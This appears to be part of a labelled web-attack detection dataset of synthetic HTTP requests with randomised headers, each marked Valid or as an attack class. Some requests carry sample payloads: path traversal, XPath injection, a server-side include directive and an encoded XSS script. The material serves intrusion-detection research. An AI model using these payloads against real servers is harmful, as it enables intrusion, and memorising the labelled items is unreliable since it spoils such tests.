End - Id: 5101
Start - Id: 4693
class: Valid
POST /5naea/psRewravr9nrnmgdyi/smKMYqitIQC/s6n@l-i/evFyC_lScUsZP0Yqt/9S/g1osoz7tsdnE/0cmddechocservices/fwXBw592iYxcn2/g9nhhimptneeztuRvwo/ZVzLBX268Jfg6/xroie.bin? HTTP/1.0
Content-Length: 35
Content-Language: osn
Content-Encoding: deflate
Content-Location: http://www.sntnel.uk/tbbaof/3mhoq2ih.php3
Content-MD5: aHNzZ2xSbnd5ZW1jTml0bg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 26 Nov 08 12:52:18 GMT
Last-Modified: Wed, 11 Mar 09 05:43:25 GMT
Host: 170.106.204.70:30
Connection: close
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 110.67.81.196
Cookie: hgu=sagjtehts4;st=608402;RUWsX=0810;atteseitltdNHo=t;etaeRoDafemtesm=318;e0tunzn=12684597
Cookie2: $Version="2"
Date: Sat, 20 Dec 08 12:20:22 CET
ETag: W/"gDAN7opdf@h0OXWVgwb3"
Expect: 100-continue
From: sioaA@hwxrt2des.de
If-Modified-Since: Sat, 07 Nov 09 10:16:32 CET
If-Unmodified-Since: Fri, 07 Nov 08 08:11:49 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 6096
MIME-Version: 6.6
Pragma: eosgxx='h7bteow'
Proxy-Authorization: 1sso Eodpor=eor82e
Authorization: niymn ke2ermn=ullnoe
Range: 511-,489649-576168,-523
Referer: http://www.listbeN.de/sInsou/ga6taO6d/vwps/otUinr.txt
TE: chunked,gzip,trailers
Trailer: Expect
User-Agent: Mozilla/4.3 (Machintosh; U; PPC Mac OS X 3.7; nh-e7; rv:2.0.2) Gecko/14397302
UA-CPU: 68000
UA-Disp: 199,143,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 5828x404
Via: 6.5 227.232.158.172, FTP/5.3 254.199.123.109:88034
Transfer-Encoding: gzip
Upgrade: ysyAt/4.9, ygi/4.5
Warning: 536 10.92.102.202 "5tc0ut6" "Wed, 19 Aug 09 01:08:40 GMT"
X-Forwarded-For: 112.130.112.55
X-Serial-Number: 263274968971
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

aJImG=h?oN&QdwupdateNGV6=82181504

End - Id: 4693
Start - Id: 44988
class: PathTransversal
GET /656/ynn7bNum/ycfPBRirROJ@2Y/orIshutdown./ultaaemdsaoOts/cIccnnentv/oqVH5hvA86/zbPZZU/aLfU.swf?sezluiyE2wstgDe=d9&nkbemdbeenC=0615&kilsnae=1714993838&ae=oyitAet7uf&qeeohrP=obe+mm%5Ds&195Axhttp4=..%2F..%2F..%2Fusr%2Fdsqqdsqsd.xml&H_HKW2hxswV.=000778&naueg3nwdbst=26&etippeeoiT2naui=Deiec&uimoe9i5o=rcpm+ltcopynph-imglogoS HTTP/1.1
Host: www.lpsDlaohi.de:80
Connection: keep-alive
Accept: image/jpeg
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: no-transform
Client-ip: 223.133.197.156
Cookie: 5hthathegevdnhs=eeellt;oa=larfer;u9aalem8c=15;1y35ien30rrh=sock_streamscriptnsA95nj
Cookie2: $Version="8"
Date: Mon, 25 Feb 08 07:29:31 GMT
ETag: W/"a1R.YRhfU8maSQMh170o"
Expect: potvSX=cregh;Dgtzo=behsO1a
From: esra@5dfeusd9Lo.de
If-Modified-Since: Wed, 14 Apr 04 20:14:10 GMT
If-Unmodified-Since: Tue, 22 Mar 05 16:23:36 CET
If-Match: *
If-None-Match: "3MM8ouQr5OiK1-pX"
If-Range: *
Max-Forwards: 0845
MIME-Version: 0.8
Pragma: aaeefew='jbwsitm'
Proxy-Authorization: Basic ZW5sdGlvTnU6aDV0cG5l
Authorization: NTLM dWZlbHVobjJ0YW5vb3hzdXp0ZXRobk13dVZsZ0RjcmhvZWhtaHQ=
Range: -724
Referer: /6oqe1/hbemre2/tsOw5bts.zip
TE: deflate,chunked,trailers
Trailer: Accept-Encoding
User-Agent: wuzJfWX- http://www.citsocm.uk
UA-CPU: 68000
UA-Disp: 272,747,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 298x3014
Via: 0.0 157.187.125.92, 4.8 www.rrtdsmo.js:084, gvou/6.7 64.107.225.99
Transfer-Encoding: identity
Upgrade: 2sihh/3.3, x4nlo1/8.6, M1u/8.1, escfn/6.3
Warning: 947 104.115.69.47 "thhtcs4" "Tue, 22 Jul 08 21:19:00 GMT"
X-Forwarded-For: 235.153.99.79
X-Serial-Number: 8606404239
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44988
Start - Id: 18651
class: Valid
GET /ph0Qs8oQAQG0ndVH/5l/sj@/wnoeidysytlen/ee/mHhejixeeE9br/uQvOuQZFvi9A_@gm1P.shtml?soxtos6iermoFwf=g6yqhnLotF&onjns5hdk1diO=jca&eetgmth7estutd=telt&eteonb7tlrie5ge=hojl%3D&G4rcpy0KEZkCq=0578&atbi=10 HTTP/1.0
Host: 235.233.236.66
Connection: woafsSon
Accept: text/xml
Accept-Charset: windows-1257;q=0.4, windows-1251
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 101.67.133.106
Cookie: zwindow.open8n=l4YN_jw;m2@7httpg1Bnull=l_O;lirjtvrvm0segT=o;iii2elo=t2t;aagiqph8dTdcc=j.lX2aznmJuc
Cookie2: $Version="42"
Date: Mon, 30 May 05 01:03:46 UTC
ETag: W/"-T4eoO3.CDM2BJMSY"
Expect: Naud=docmmtt;rdrdTo
From: dhoiTi@6ndiEy.ch
If-Modified-Since: Thu, 10 May 07 20:41:00 UTC
If-Unmodified-Since: Wed, 12 Dec 07 14:10:52 UTC
If-Match: *
If-None-Match: *
If-Range: "GQxAb@-4MqMfvWwsr"
Max-Forwards: 543
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: NTLM ZTlyb3RJN3hybWVhdHBkYVVhbzVhbjB0YTZydmV0cWhzaXJsZmVFdWl3aWl6eWlm
Authorization: Basic dGxwcGFlcjplc2kyeHJ2
Range: -0
Referer: /stgetii/uu8I.cfm
TE: trailers,gzip;q=0.7,chunked
Trailer: User-Agent
User-Agent: Mozilla/1.8 (Machintosh; U; Mac OS X 9.7; a6-2a; rv:9.4.3) Gecko/05804091
UA-CPU: StrongARM
UA-Disp: 7139,4412,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 8027x0405
Via: 1.8 185.239.133.174, 4.2 145.14.210.115:7642, FTP/9.0 33.98.251.163
Transfer-Encoding: identity
Upgrade: u8ogo5/6.3, sa1/1.1, nnsykh/2.5, buor/4.7, nege/9.4
Warning: 599 248.78.6.97 "deo0tiacbum" 
X-Forwarded-For: 157.146.253.229
X-Serial-Number: 6772472077190177266
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18651
Start - Id: 20695
class: Valid
GET /lAkomnriklarm/tsep/nLI/geugektrinedemf/tX1qvA5ET9rcLpIAo/wpositionK7if@F6urqgpl/0H/iqkQBLF0UB_cvO/2CrOe45LIq/u7Lwqh1.gif?pY2l=11s%3Ceb&snanaSbo4iGejar=9819&9sock_streamEzGoVOflF=dTUYFcKeci0 HTTP/1.1
Host: www.ffz8taudma.org
Connection: Lpyuh
Accept: */*;q=0.3
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: senjaw-ooce;q=0.5, ecriTj-lnli;q=0.1, aI5n3-id
Cache-Control: only-if-cached
Client-ip: 195.225.219.90
Cookie: 5eieeiae5l=2115439
Cookie2: $Version="49"
Date: Sat, 21 Mar 09 10:47:13 UTC
ETag: "649MQApKJ2VfT94JgRT"
Expect: 100-continue
From: Eenieeb@jtsh.ch
If-Modified-Since: Mon, 08 May 06 11:34:30 GMT
If-Unmodified-Since: Tue, 26 Apr 05 17:18:35 CET
If-Match: "LjwBB8AX_5_UkdJYzC"
If-None-Match: *
If-Range: Tue, 23 Dec 08 04:25:44 GMT
Max-Forwards: 6
MIME-Version: 5.8
Pragma: rn=jn
Proxy-Authorization: Basic aE9Jbm06N2FOcmVlbg==
Authorization: Ttucw 9isle=Eawcinh
Range: 15-,71-,5-
Referer: http://www.tosf8.it/rju3tem/adhtsiOO/Ioscos/otene/INll.js
TE: chunked,deflate,chunked;q=0.9
Trailer: Accept-Charset
User-Agent: onhooaEr/7.0.1
UA-CPU: Sparc
UA-Disp: 031,1343,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 413x553
Via: HTTP/4.1 217.4.100.135, HTTP/1.2 181.239.57.102, HTTP/5.0 www.hmhkee.png
Transfer-Encoding: identity
Upgrade: eelter/7.4, vro/5.9, Mxe/7.9, ha0ne/4.9, 0e6/5.8
Warning: 078 4.18.109.190 "qceetbhebMca6" "Wed, 01 Aug 07 08:37:44 CET"
X-Forwarded-For: 255.159.77.194
X-Serial-Number: 7399609
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20695
Start - Id: 10860
class: Valid
GET /ofwc/HutasetTjncet/7mm.OBPbC/e01txWH0CqyL/s7dg_Q6tnfqN1dtp/2amw.jpeg?eacug4cueershq=lfO&jth=533&uabstoqrro=dlAon4tiwhe487mei2&qeotgetnettsdfo=5&EV-md5deletew=1osg8vAltr1rOoqca HTTP/1.1
Host: 253.242.128.165
Connection: keep-alive
Accept: application/rtf, video/*;q=0.4
Accept-Charset: euc-cn;q=0.7, utf-7;q=0.7, windows-1255
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 177.2.181.122
Cookie: mUZI5E=7.oQ9;OaafBnsa=t5Rg;esqw=8871642
Cookie2: $Version="122"
Date: Thu, 12 Aug 04 11:21:05 GMT
ETag: W/"YaCyQ65DuvEB29L"
Expect: isntrath
From: MAtn@aarleli.uk
If-Modified-Since: Mon, 29 Dec 08 22:25:27 UTC
If-Unmodified-Since: Sun, 13 Mar 05 14:04:41 UTC
If-Match: "3MYSfdtmiiZiRL2d"
If-None-Match: *
If-Range: "wVxnmWUpcCKrkUI"
Max-Forwards: 67
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: NTLM bHRvb2Vyd2VuU29lQWVtMFRBdG9ld2V5aVlvbmFlZXNmb3VTcmVPdGxzbnY=
Authorization: nxby t4heyrBi=oetg
Range: -67,-5514,24049-4325
Referer: /rzes/tlbsw/lyrhU.mpeg
TE: gzip,trailers
Trailer: Connection
User-Agent: Mozilla/7.1 (Machintosh; U; PPC 5.8; By-Hr; rv:9.4.7) Gecko/85318736
UA-CPU: 68000
UA-Disp: 988,901,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 488x175
Via: HTTP/4.8 www.5mrtn.htm, 0.3 78.73.54.244
Transfer-Encoding: identity
Upgrade: hwTcr/4.5, 42n5/1.2
Warning: 434 www.ie6nOtrs.css "ugbasogg" "Sat, 09 Sep 06 10:13:30 CET"
X-Forwarded-For: 100.116.0.127
X-Serial-Number: 907495686273869
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10860
Start - Id: 27514
class: Valid
GET /cPBjJF/LMiesUhameaoe6gbbo/ekVbV6rK1meSYt3Ok_xG/CbtbkMD/ezmCg-bw0/MZ/weaetbirwEewozQco/hn3oyEr/i.ze6tRQuemYuMZ/lfM.exe?tExtSeorm=mdtS8trenndo&netcatOEfq=g0is&CallUmailkpositionfjq=19817&eef7esI7=kuuanrnba&thliOf=tL824&2ifonEatolenyb=iek&4EaeeasHeOto=eeel5&U6ogsgalnnnahhw=+telnetpl5%7E HTTP/1.0
Host: www.CHoswp.com
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip;q=0.8, compress;q=0.5, gzip, deflate
Accept-Language: *
Cache-Control: min-fresh=7
Client-ip: 240.72.18.67
Cookie: ZlinkperlE9ohavingk8replaceA=olF
Cookie2: $Version="1"
Date: Fri, 06 Nov 09 01:20:35 GMT
ETag: "fvjWGc7zSZjCcXPT"
Expect: me45h5b
From: Ifxyn@cystcefu.uk
If-Modified-Since: Sun, 07 Dec 08 18:52:54 GMT
If-Unmodified-Since: Wed, 30 Jun 04 10:11:34 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 04 Sep 08 19:50:10 GMT
Max-Forwards: 802
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: Digest qop=CeGosd
Authorization: Basic ZW9mbW9uZDpvZG85
Range: 1237-98,8233-,5148-10
Referer: http://heetscst.de/ewdsh/elS0.conf
TE: chunked;q=0.0,gzip,chunked
Trailer: Max-Forwards
User-Agent: Mozilla/3.6 (Machintosh; U; PPC 2.9; ls-mu; rv:2.5.2) Gecko/42263229
UA-CPU: PowerPC
UA-Disp: 883,733,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 5041x3321
Via: 6.7 29.68.121.22, 6.7 247.209.229.36, 9.7 www.EgsonCt.jpg
Transfer-Encoding: uotUnv
Upgrade: ieiie/4.6, kord/5.1, Nat/2.2
Warning: 561 www.Nlensr.png "s0qusp6lni" 
X-Forwarded-For: 102.128.80.116
X-Serial-Number: 8783234451
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27514
Start - Id: 25821
class: Valid
GET /_OdMtbhtpass7al_sconnect/trnee/dw.oPC/s9bbcgxbxkoEiteuhbak/ms065vIadpwr/w0tnso/toqD8JCxZ/nPoJF-VY450aq/erv3hntcuou.jpg?2Z22eAalocationLperl6=%24unionh5rZ%24i%40%7Ew&apeltngaeh=6330&sndsa0to=hatawitrnpeNO&nefebMacmhl=ew&W9eqer=%3D%29k%3Ef&rmhtsaewtt=1089705769&6va=fps8%3Eo HTTP/1.0
Host: 135.26.27.241
Connection: close
Accept: */*
Accept-Charset: shift_jis;q=0.3, windows-1257, x-mac-cyrillic, gb2312
Accept-Encoding: identity, identity;q=0.7, deflate, compress
Accept-Language: *;q=0.4
Cache-Control: 5sbig=4hqztts
Client-ip: 253.102.123.168
Cookie: tcrsrOo=442;or9eAlqe8nu=1875878134;WTpLDQqknph-=R1
Cookie2: $Version="869"
Date: Wed, 15 Jul 09 12:34:32 UTC
ETag: W/".nGUdyXJESFpZ8c"
Expect: vslup=28saei1e
From: ezNeot@Teed.it
If-Modified-Since: Thu, 26 Jan 06 08:17:52 CET
If-Unmodified-Since: Mon, 18 Dec 06 14:19:16 UTC
If-Match: "Giznk2xqJv1tRnJ-v9l-"
If-None-Match: "jF8f-zwm57WqONy"
If-Range: Wed, 31 Jan 07 04:07:46 GMT
Max-Forwards: 86
MIME-Version: 8.5
Pragma: bs8s=hs
Proxy-Authorization: Digest uri=http://tseiT5w.ch/3hoeTtpe/ueeanc/polor7yc.tiff
Authorization: Digest qop=auth
Range: 644-,-02
Referer: http://sihssrd.st/hntzLaAe/Oi82.avi
TE: gzip;q=0.0
Trailer: Accept-Charset
User-Agent: ydrrsSde5 (lKSOcIV; h.FuUK2jR; ugzeap; hYxQM-ptEb)
UA-CPU: MIPS
UA-Disp: 733,9248,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 3296x601
Via: HTTP/8.0 160.42.49.107, HTTP/5.2 www.lnalyp.js, FTP/8.3 www.aAmj.html:5080
Transfer-Encoding: po2a2t; aetdtd=6riwe2d
Upgrade: andf/8.3, dmn/5.9, 4hni/6.0
Warning: 886 145.152.248.154 "h6n7sqlaahdlAhre0" 
X-Forwarded-For: 243.205.213.82
X-Serial-Number: 5771791492061
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25821
Start - Id: 48705
class: XPathInjection
PUT /sd2/9pnnrirtdi/sg/copyssKwp-2/lcfeioe5iwnpaeae2we1/9hwA7U.a2kwq7hbsTznY/i5rAsnbgretex/t2u-/ie6itr4bixoh5iae.shtml? HTTP/1.0
Content-Length: 148
Content-Language: czpdi
Content-Encoding: deflate
Content-Location: /Snspgits/lrst7g.nsf
Content-MD5: YW5hQWxiZTducmVvZDR0cw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 09 Feb 06 18:03:59 CET
Last-Modified: Mon, 30 Nov 09 03:23:19 GMT
Host: 150.96.121.197:14
Connection: 1eEncydh
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: cg-zealo;q=0.1, dhdi-nwh3j;q=0.5
Cache-Control: no-store
Client-ip: 159.42.128.3
Cookie: huuae=bosexect;cat7rVha4=taem t6 T3;@Wx0c=~6techoleisucst0insertrIhttpsalr;Eorr= ie tshobhcV
Cookie2: $Version="372"
Date: Fri, 03 Feb 06 07:29:42 UTC
ETag: "iRPx-vhsrn5IOB4F@6ra"
Expect: iuxo
From: Wquiz@fowi.gov
If-Modified-Since: Sun, 05 Nov 06 01:55:38 GMT
If-Unmodified-Since: Thu, 25 Sep 08 02:22:28 GMT
If-Match: *
If-None-Match: "wjgX@SBRvJhk.LIdy"
If-Range: Sun, 13 Dec 09 11:56:18 CET
Max-Forwards: 9
MIME-Version: 7.4
Pragma: s2ei='Hh'
Proxy-Authorization: Digest realm
Authorization: NTLM aHo2cnQ4bW5ZcmVmNXJhZXVtb3NpY2V1U2xBaElsZWE=
Range: 522185-0,03103-
Referer: http://www.gA6v.biz/insa/ltrrhste/tuutow.swf
TE: deflate;q=0.7,deflate;q=0.0,chunked
Trailer: Expect
User-Agent: Mozilla/6.1 (X11; U; Solaris 4.1; ce-ah; rv:4.1.0) Gecko/50466400
UA-CPU: 68000
UA-Disp: 2550,506,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 640x9904
Via: 1.7 www.alytr.css
Transfer-Encoding: faisS
Upgrade: phe/8.1, Jtnat/6.7
Warning: 956 www.8Oqk.shtml:3 "dhfeiV6ltr" 
X-Forwarded-For: 231.51.107.90
X-Serial-Number: 70312364698710750668
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

ob0frepu=5     or     1<    n/oyhl/tleu/child::text()[position()=654]  or     545='] | /* | /foo[bar='

End - Id: 48705
Start - Id: 4428
class: Valid
PUT /mrrdemiyy/taulehaarlo4w.swf? HTTP/1.1
Content-Length: 223
Content-Language: lt,j
Content-Encoding: identity
Content-Location: /sze4/eauhs6.php4
Content-MD5: RXhzeWNlOXB6c2FlM2JmZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 26 Aug 06 20:05:22 CET
Last-Modified: Thu, 18 Oct 07 11:04:18 CET
Host: 50.249.213.34
Connection: wCSi
Accept: */*;q=0.9
Accept-Charset: *;q=0.8
Accept-Encoding: gzip;q=0.4, identity;q=0.0, gzip
Accept-Language: aanoEo-Ete, mnluegel-itT, hmttiq-iO8hqtb
Cache-Control: N='llsiosoa'
Client-ip: 30.242.53.46
Cookie: snsG=18802348;grmrn2dossths3n=sf;otdtptsrb0aihp=g0b oe;cttYs=89;HX8hG=85&gon dnhoehl;-v.tD4Y=cchild
Cookie2: $Version="91"
Date: Wed, 02 Nov 05 23:48:54 UTC
ETag: "Gmpo2_GvpsQPDAy"
Expect: 100-continue
From: tOtyah@r88dwnoa.st
If-Modified-Since: Wed, 04 Feb 09 01:59:17 UTC
If-Unmodified-Since: Mon, 05 Jan 04 07:25:48 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 15 Nov 08 04:13:34 UTC
Max-Forwards: 04
MIME-Version: 6.8
Pragma: fERa=odxEejs
Proxy-Authorization: NTLM SGkyc0Rvc2V0cjhmZTBZc2d5ZTdmMWlicm9kNWx4Z2g=
Authorization: eose EjV1=ri3gcit
Range: 0-,20077-,-023590
Referer: http://www.wMsyr.gov/e7iNty.wmn
TE: gzip,deflate;q=0.0
Trailer: If-Unmodified-Since
User-Agent: 5rulo/3.2.8.5.1
UA-CPU: Sparc
UA-Disp: 3339,068,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 6849x3464
Via: tsrcer/1.6 www.rini9fe.html:13952, eie7l/8.7 34.61.215.120, 2.4 81.113.1.201:1658
Transfer-Encoding: gzip
Upgrade: aw7qe/7.0, Owgd/5.7
Warning: 774 98.7.54.149 "snI8ejlpssn" "Tue, 19 Apr 05 06:05:00 CET"
X-Forwarded-For: 92.174.150.38
X-Serial-Number: 763591863096384767
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ahih8Olg=[>h&0ninnn=jeoi&ataaxu1oat=660957&h_V9Chtacces6Pprocessing-instruction2=to1exu2ltls+ee1Ldwos&oil=1090&sy=yL.h6&etoMOiesfIpaEe=7t&9.6W9Plsu.6=aihueku&il9a76eesN=hs5/vOhtpassnidte&iee0ael7i=et3meelxndssmx8tif

End - Id: 4428
Start - Id: 9460
class: Valid
GET /BRmail7oBnql5/hBmm9/vyMtondSOuo/fS9xheSperloVupdateadmin/ait/qp2z.sh? HTTP/1.1
Host: 96.65.222.14:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: identity;q=0.7, identity, deflate;q=0.4, identity
Accept-Language: *;q=0.5
Cache-Control: min-fresh=31
Client-ip: 232.247.249.159
Cookie: ieb2fFXtA=Ce8/t(se%null\Rt99eg;eho1eqyt=acesJoI1eMhe
Cookie2: $Version="37"
Date: Mon, 18 Jun 07 24:02:36 CET
ETag: W/"XiIcXiKCk8hDam_W-6xj"
Expect: 100-continue
From: ieue@hoegnHqytl.be
If-Modified-Since: Sat, 26 Mar 05 13:28:53 GMT
If-Unmodified-Since: Sat, 25 Nov 06 08:37:07 UTC
If-Match: "AVRKwF57zJp0_xoX"
If-None-Match: *
If-Range: Mon, 10 May 04 01:12:02 GMT
Max-Forwards: 352
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: Basic eXdibHRhOmJhNmg1eXQ=
Authorization: Basic d3BhZWt1ZXk6ZWFhbmxqZ2U=
Range: 952531-,60-2,-52
Referer: http://www.mihnsed.st/oleae/tehrp/hanlo/nbotn.asmx
TE: trailers,deflate;q=0.6
Trailer: Date
User-Agent: Mozilla/4.7 (Windows; U; Win98 2.8; o8-sH; rv:9.5.5) Gecko/70477487
UA-CPU: MIPS
UA-Disp: 073,150,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 383x664
Via: 7.9 www.7hlH6f.jpg, 0.5 www.blea1trn.html
Transfer-Encoding: identity
Upgrade: osunde/3.2, hb1wa/9.8, twa/3.2, aRypee/7.6, knlu8/6.7
Warning: 579 28.101.180.151:87 "tiicEdd" "Tue, 17 May 05 01:19:10 GMT"
X-Forwarded-For: 139.44.198.239
X-Serial-Number: 61920420693
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9460
Start - Id: 40767
class: SSI
POST /6iR/c9noRdOyrx/iN6nrjuRlbtinnhpre/tbfm6/3FvD6.systemJE/a2hV7ah7GmehM-/fP/6G4SHqCc@Gu1t.gif? HTTP/1.1
Content-Length: 111
Content-Language: unnHiu
Content-Encoding: identity
Content-Location: http://www.ddoO.uk/6iSWtsw/anut/ehtdtn/euhsi/cep3oct.tar
Content-MD5: ZWdodGJkQXV0ZXRhc2lvcg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 28 Feb 04 12:58:49 CET
Last-Modified: Fri, 11 Jun 04 23:37:49 UTC
Host: www.idstt.ch
Connection: keep-alive
Accept: image/*, video/*
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: no-cache
Client-ip: 166.41.33.129
Cookie: holsbfje=rinlmm14tabrcpahm;othrnoiew25af8h=sgaulhoHTtie1a
Cookie2: $Version="630"
Date: Thu, 13 Sep 07 01:52:58 UTC
ETag: "-mDaC72APAXSOUm"
Expect: neiat
From: tt33en@1osNNfn.biz
If-Modified-Since: Tue, 11 Dec 07 05:32:55 UTC
If-Unmodified-Since: Sat, 03 Oct 09 02:33:08 CET
If-Match: "3ZgQE1_cCBmM-6Iey@"
If-None-Match: "z0laz.ruwPweKf_QTK"
If-Range: Sun, 15 Aug 04 17:17:46 CET
Max-Forwards: 6509
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: NTLM SW5hcmx0ZTA2Zmk3ZWt0bGUxZW50aHNpaFJvcm5wc2llZWFlZXVkbmF0cWxh
Authorization: Digest algorithm=MD5-sess
Range: 07-9,0-,-333
Referer: http://rneoeit.uk/nuls/ieneeon.sh
TE: deflate;q=0.4,chunked;q=0.6
Trailer: Max-Forwards
User-Agent: Mozilla/8.0 (Machintosh; U; PPC 8.9; 2e-pY; rv:2.7.3) Gecko/34740207
UA-CPU: 68000
UA-Disp: 442,6070,32
UA-OS: Win98
UA-Color: color16
Via: FTP/1.2 240.98.141.252
Transfer-Encoding: s0et
Upgrade: rhe/3.3
Warning: 515 255.26.146.194 "etiqarDie" 
X-Forwarded-For: 31.100.82.188
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mq3jimg9MMjnQ=<!--   #odbc connect="xie,p0oc,B26"    statement="select    *  from s"-->

End - Id: 40767
Start - Id: 12922
class: Valid
GET /iU2dOuVplqk1nuvMjqbW/9sidds/lltCa0tnsl/iee1f0ehrDi/ieaftoWli4itdtsn9Qg6.asmx?nrciss=52&7o5cMe9e=o-hcopy%3Ba%3Ehnfnzecntu&Ryat=sBUExq4 HTTP/1.1
Host: 34.89.243.125
Connection: oeeHn
Accept: text/*
Accept-Charset: koi8;q=0.6, koi8;q=0.9, euc-jp;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 61.74.22.45
Cookie: nYiwlhnwsl=8408;ridma2a=7eksag;rht=uelEeihte
Cookie2: $Version="4"
Date: Mon, 16 Mar 09 24:18:19 CET
ETag: "XnWtO8WqoUeydMxAypF"
Expect: hknaht=Utsyli
From: 6noa@u4aeil.be
If-Modified-Since: Thu, 03 Jun 04 11:53:31 GMT
If-Unmodified-Since: Thu, 04 Jun 09 24:04:26 GMT
If-Match: "W5SIyYsyLv8.VJU4yzGd"
If-None-Match: "nA-UarNRdRHd-N1dPk3W"
If-Range: "FVISSZ8lj@TSfbQtB"
Max-Forwards: 308
MIME-Version: 3.9
Pragma: s=EsYcCr7
Proxy-Authorization: e1Ntj 3ahntdmE=coilaae
Authorization: Digest username="tihise"
Range: 976-,-97584
Referer: http://dzt5.uk/roi4cc.txt
TE: trailers
Trailer: From
User-Agent: h8DMf1H http://www.nbouz.com
UA-CPU: Sparc
UA-Disp: 549,689,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 3851x1864
Via: Ahtie/9.1 www.ifnot.png, 8.2 www.nnar.js, HTTP/7.0 87.63.85.242:7734
Transfer-Encoding: identity
Upgrade: eul/4.8, rnguen/8.4, trlsnm/4.9, eetr/3.8
Warning: 691 41.250.210.130 "ffe80f8nl" "Thu, 23 Jul 09 01:06:32 UTC"
X-Forwarded-For: 85.130.149.249
X-Serial-Number: 194126085
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12922
Start - Id: 47069
class: XSS
GET /elRqrtFDtoDvqnaS/eL231kR4ARUdNr.shtml?etecoteiy2ti=umec&3ti=ebodytmpo&wga=eebej3fsMes&wmdyieyfd=%28a+ndneer&5tMdurenocb=mfefiGre4rg7zh7&aasTn=%5B%5CxC0%5D%5B%5CxBC%5Dscript++%3E%5Balert++++%28%27pola%27%29%3B%5D%5B%5CxC0%5D%5B%5CxBC%5D%2Fscript+%3E&passthrurgE7W=98857824&idrllpn=564251795&aweei9i=h%40lylG&cth47dmtaoi=29 HTTP/1.1
Host: 31.223.244.196:80
Connection: 349s
Accept: text/*;q=0.0, application/rtf;q=0.7, audio/basic;q=0.9
Accept-Charset: *;q=0.5
Accept-Encoding: identity;q=0.2, compress;q=0.6, identity, deflate, deflate;q=0.5
Accept-Language: irze6ofl-o
Cache-Control: no-transform
Client-ip: 217.116.65.138
Cookie: ec=62009654;Fs_96u5_6p=08connectqtt: servicesncHeeisoiformt;ahsed1cnnts=vgn0ezteeeahgois/betweenh;DLd2HK=ncneba;ivEmznJmi=629886
Cookie2: $Version="5"
Date: Mon, 28 Sep 09 16:26:06 GMT
ETag: W/"wGGf4xS-@46WFj8"
Expect: yshaae=hl6e2eC
From: l5ga@0acwrnnsyp.biz
If-Modified-Since: Tue, 01 Dec 09 15:19:46 CET
If-Unmodified-Since: Tue, 12 Feb 08 14:22:48 CET
If-Match: "s3IjE_BSN5P4UBme"
If-None-Match: *
If-Range: *
Max-Forwards: 08
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: NTLM dGJ0b2VjdDBhdG1zb3V5dGx1b2V1aWJzc0s2MXpobmliYXRoZWVpbw==
Authorization: Digest cnonce="p0oa"
Range: 42191-21573,0-729,-0
Referer: http://t7Ht.ch/56si/meoqjdyb/ceny/icecaas/fLefes.asmx
TE: trailers,gzip;q=0.4,deflate;q=0.1
Trailer: Via
User-Agent: y7In_Xr http://www.yceftghm.gov
UA-CPU: MIPS
UA-Disp: 016,6175,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 987x1282
Via: 7.4 207.240.198.26
Transfer-Encoding: identity
Upgrade: doNfr/2.8
Warning: 889 109.167.98.103 "ceSomrehteyFeh" "Sat, 20 Jan 07 24:44:38 UTC"
X-Forwarded-For: 240.93.48.210
